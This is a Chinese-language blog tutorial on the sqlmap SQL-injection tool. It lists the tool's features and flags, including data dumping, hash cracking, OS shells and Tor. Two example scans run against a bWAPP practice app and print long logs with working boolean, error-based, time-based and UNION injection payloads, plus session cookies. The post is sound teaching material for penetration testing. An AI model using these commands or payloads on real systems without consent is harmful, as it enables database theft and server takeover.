sqlmap工具使用手册

最新推荐文章于 2024-05-09 18:30:00 发布
最新推荐文章于 2024-05-09 18:30:00 发布
阅读量2.3k 收藏 5
点赞数 1
分类专栏: Web安全 Python MySQL 文章标签: 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012002125/article/details/125332622
版权
Python 同时被 3 个专栏收录
47 篇文章 1 订阅
订阅专栏
MySQL
14 篇文章 1 订阅
订阅专栏
Web安全
11 篇文章 2 订阅
订阅专栏

 sqlmap简介

sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎,同时有众多强大功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

sqlmap特性

  • 全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB 和 Virtuoso数据库管理系统。

  • 全面支持六种SQL注入技术:基于布尔盲、基于时间盲、基于错误、基于UNION查询、堆栈查询和带外查询。

  • 通过提供DBMS凭证、IP地址、端口和数据库名称,支持不通过SQL注入直接连接到数据库。

  • 支持枚举用户、密码散列、特权、角色、数据库、表和列。

  • 自动识别密码哈希格式,并支持使用基于字典的攻击破解它们。

  • 支持完全转储数据库表,根据用户的选择转储一系列条目或特定列。用户还可以选择从每个列的条目中只转储一定范围的字符。

  • 支持搜索特定的数据库名称、跨所有数据库的特定表或跨所有数据库表的特定列。例如,这对于识别包含自定义应用程序凭据的表非常有用,其中相关列的名称包含name和pass等字符串。

  • 当数据库软件是MySQL, PostgreSQL或Microsoft SQL server时,支持从数据库服务器底层文件系统下载和上传任何文件。

  • 当数据库软件为MySQL, PostgreSQL或Microsoft SQL server时,支持在数据库服务器底层操作系统上执行任意命令并检索它们的标准输出。

  • 支持在攻击者机器和数据库服务器底层操作系统之间建立带外有状态TCP连接。根据用户的选择,该通道可以是交互式命令提示符、Meterpreter会话或图形用户界面(VNC)会话。

  • 支持通过Metasploit的Meterpreter getsystem命令升级数据库进程的用户权限。

sqlmap常用命令

目标相关参数:必须提供这些选项中的至少一个来定义目标

请求相关参数:这些选项可用于指定如何连接到目标URL

  • --cookie=COOKIE HTTP Cookie报头值(例如:“PHPSESSID = a8d127e…”)

  • --random-agent 使用随机选择的HTTP User-Agent报头值

  • --proxy=PROXY 使用代理连接到目标URL

  • --tor 使用Tor匿名网络

  • --check-tor 检查Tor是否被正确使用

注入相关参数:这些选项可以用来指定要测试的参数,提供定制的注入有效负载和可选的篡改脚本

  • -p TESTPARAMETER 可测试的参数列表

  • --dbms=DBMS 强制后端DBMS提供值

扫描相关参数:这些选项可用于定制检测阶段

  • --level=LEVEL 要执行的测试级别(1-5,默认1)

  • --risk=RISK 执行测试的风险(1-3,默认1)

注入技术相关参数:

  • --technique=TECH.. 使用的SQL注入技术(默认为“BEUSTQ”)

枚举:这些选项可用于枚举表中包含的后端数据库管理系统信息、结构和数据

  • -a, --all 检索所有

  • -b, --banner 检索DBMS banner 信息

  • --current-user 检索DBMS当前用户

  • --current-db 检索DBMS当前数据库

  • --passwords 枚举DBMS用户密码散列

  • --tables 枚举DBMS数据库表

  • --columns 枚举DBMS数据库表列

  • --schema 枚举 DBMS 架构

  • --dump Dump DBMS数据库表项

  • --dump-all 转储所有DBMS数据库表项

  • -D DB DBMS数据库枚举

  • -T TBL DBMS数据库表枚举

  • -C COL 要枚举的DBMS数据库表列

操作系统访问参数:这些选项可用于访问操作系统底层的后端数据库管理系统

  • --os-shell 提示输入交互式操作系统shell

  • --os-pwn 提示一个OOB shell, Meterpreter或VNC

全局相关参数:这些选项可用于设置一些通用的工作参数

  • --batch 不要要求用户输入,使用默认行为

  • --flush-session 刷新当前目标的会话文件

其他参数:这些选项不属于任何其他类别

  • --wizard 简单的向导界面初学者

sqlmap使用案例一

说明:

1、扫描bWAPP - Login注入点,并附带cookie,其他参数不设置(默认)

2、扫描过程中会提示选择扫描的选项

3、扫描结束会打印扫描结果,如果存在注入点会打印注入类型、注入的playload

sqlmap -u"http://8.142.109.131:8080/sqli_2.php?movie=1&action=go" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

扫描分析过程输出:

$ sqlmap -u"http://8.142.109.131:8080/sqli_2.php?movie=1&action=go"  –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 11:26:54 /2022-06-17/
​
[11:26:54] [INFO] testing connection to the target URL
[11:26:54] [WARNING] potential CAPTCHA protection mechanism detected
[11:26:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:26:55] [INFO] testing if the target URL content is stable
[11:26:55] [INFO] target URL content is stable
[11:26:55] [INFO] testing if GET parameter 'movie' is dynamic
[11:26:55] [WARNING] GET parameter 'movie' does not appear to be dynamic
[11:26:55] [INFO] heuristic (basic) test shows that GET parameter 'movie' might be injectable (possible DBMS: 'MySQL')
[11:26:55] [INFO] heuristic (XSS) test shows that GET parameter 'movie' might be vulnerable to cross-site scripting (XSS) attacks
[11:26:55] [INFO] testing for SQL injection on GET parameter 'movie'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:28:35] [WARNING] reflective value(s) found and filtering out
[11:28:36] [INFO] GET parameter 'movie' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Cobra Commander")
[11:28:36] [INFO] testing 'Generic inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:28:36] [INFO] GET parameter 'movie' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[11:28:36] [INFO] testing 'MySQL inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:28:36] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:28:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:28:59] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:28:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:29:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:29:10] [INFO] GET parameter 'movie' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:10] [INFO] target URL appears to have 7 columns in query
[11:29:11] [INFO] GET parameter 'movie' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'movie' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[11:29:36] [INFO] testing if GET parameter 'action' is dynamic
[11:29:36] [WARNING] GET parameter 'action' does not appear to be dynamic
[11:29:36] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[11:29:36] [INFO] testing for SQL injection on GET parameter 'action'
[11:29:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:29:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:29:37] [INFO] testing 'Generic inline queries'
[11:29:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:29:47] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:29:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:29:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:30:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:17] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:30:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:30:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:30:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:30:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:30:46] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:30:49] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:30:53] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:30:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:31:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:31:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:31:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL inline queries'
[11:31:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:31:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:31:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:31:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:32:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:32:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:32:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:32:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:32:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:32:16] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[11:32:20] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[11:32:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[11:32:28] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[11:32:31] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[11:32:35] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[11:32:37] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[11:32:39] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[11:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:32:45] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:32:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:32:54] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:32:58] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:33:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:33:07] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:33:09] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:11] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:33:13] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[11:33:13] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:33:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:33:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[11:33:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:33:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:34:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[11:34:33] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3858 HTTP(s) requests:
---
Parameter: movie (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: movie=1 AND 8304=8304&action=go
​
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: movie=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170717671,(SELECT (ELT(6100=6100,1))),0x7176706271,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go
​
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: movie=1 AND (SELECT 6517 FROM (SELECT(SLEEP(5)))DXhM)&action=go
​
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: movie=-4573 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170717671,0x6c7642426e6e6d6c76616d6c65767367616c716f7266585344614a47594465704259774f73704c72,0x7176706271),NULL,NULL-- -&action=go
---
[11:34:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[11:34:33] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
​
[*] ending @ 11:34:33 /2022-06-17/

sqlmap使用案例二

说明:

1、扫描bWAPP - Login注入点,并附带cookie,指定数据库类型为mysql

2、扫描过程中会提示选择扫描的选项,合理的选择会减少扫描范围

3、扫描结束会打印扫描结果,如果存在注入点会打印注入类型、注入的playload

sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

 

 扫描分析过程输出:

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" –-cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.6#pip}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 18:10:49 /2022-06-16/
​
[18:10:49] [INFO] testing connection to the target URL
[18:10:51] [WARNING] potential CAPTCHA protection mechanism detected
[18:10:51] [INFO] testing if the target URL content is stable
[18:10:51] [INFO] target URL content is stable
[18:10:51] [INFO] testing if GET parameter 'title' is dynamic
[18:10:52] [WARNING] GET parameter 'title' does not appear to be dynamic
[18:10:52] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[18:10:52] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:52] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:11:53] [WARNING] reflective value(s) found and filtering out
[18:11:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:11:54] [INFO] testing 'Generic inline queries'
[18:11:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:11:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:12:04] [INFO] GET parameter 'title' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Z")
[18:12:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:12:04] [INFO] GET parameter 'title' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[18:12:04] [INFO] testing 'MySQL inline queries'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:15] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:12:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:12:16] [INFO] target URL appears to have 7 columns in query
[18:12:16] [INFO] GET parameter 'title' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:12:16] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[18:12:53] [INFO] testing if GET parameter 'action' is dynamic
[18:12:53] [WARNING] GET parameter 'action' does not appear to be dynamic
[18:12:53] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[18:12:53] [INFO] testing for SQL injection on GET parameter 'action'
[18:12:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:54] [INFO] testing 'Generic inline queries'
[18:12:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:13:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:13:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:13:55] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[18:14:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:14:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:14:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:14:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:14:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:14:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:14:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:14:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
